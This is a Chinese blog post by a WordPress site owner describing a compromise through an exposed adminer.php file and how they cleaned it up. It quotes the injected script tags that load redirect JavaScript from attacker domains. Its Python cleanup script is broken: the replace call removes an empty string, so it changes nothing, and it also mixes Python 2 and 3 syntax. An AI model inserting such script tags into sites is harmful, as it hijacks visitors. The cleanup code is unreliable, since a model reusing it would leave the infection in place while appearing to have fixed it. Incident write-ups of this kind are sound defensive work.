发现被黑

我这快一年没打理的wordpress个人小站竟然被黑了。访问时主页样式明显不对，打开主页后5秒左右网站被重定向到top.worldctraffic.com等俄文网站。通过查看阿里云的日志警告我发现有Hacker利用我放在网站根目录下的adminer.php做了SQL注入(这应该是adminer.php的一个漏洞)，抓取到了wordpress网站的wp_config.php文件，进而获得了db的用户名和密码。再通过adminer.php对网站db进行了篡改。（此时只想问候这个Hacker的族谱。）

入侵行为和修复方案

通过分析，我确定了入侵者的具体行为并找到了修复网站的办法。
入侵者的具体行为是：

• 修改wp_options表的site_url字段为：https://top.worldctraffic.com/。【修复方案】 db中重新设置site_url设置为网站的域名。
• 在wp_post表wp_content字段的每条记录尾部插入字符串：

<script src="https://scripts.trasnaltemyrecords.com/pixel.js?track=r&subid=043" type="text/javascript"></script><script src="https://land.buyittraffic.com/clizkes" type="text/javascript"></script>

这两个js脚本会将网站重定向到top.worldctraffic.com、1.startrafficc.com等俄文网站页面。

【修复方案】编写python程序将黑客插入的重定向字符串删除，代码如下：

import MySQLdb
import pymysql
verbose = False

db = MySQLdb.connect(host="localhost", # your host, usually localhost
user="xxx", # your username
passwd="xxxxx", # your password
db="wordpress", # your db
charset='utf8')

# you must create a Cursor object. It will let
# you execute all the queries you need
cur = db.cursor()

# Use all the SQL you like
cur.execute("SELECT * FROM `wp_posts` WHERE `post_content` LIKE '%https://scripts.trasnaltemyrecords.com/pixel.js?track=r&subid=043%'")

cur_res = cur.fetchall()

# print all the first cell of all the rows
cnt = 0
for row in cur_res:
    print row[0]
    cnt += 1

    new_text = row[4].replace("", "")

    if verbose:
        print(row[4])
        print('=============================')
        print(new_text)

    sql = "UPDATE wp_posts SET post_content ='" + 
    pymysql.escape_string(new_text) +"' WHERE id="+str(row[0])
    cur.execute(sql)
    db.commit()
    #break
print('Total', cnt, 'records')
db.close()

以上代码需要修改填入你自己的db用户名和密码并安装依赖项：

pip install pymysql
sudo apt-get install python-mysqldb

• 为了杜绝wordpress的帖子里的javascript被执行，应当在wp_config.php中添加

  /** prevent html in post from executing*/
  define('DISALLOW_UNFILTERED_HTML', true);

最后，别忘记修改db密码，删除adminer.php，断绝黑客再次入侵的途径。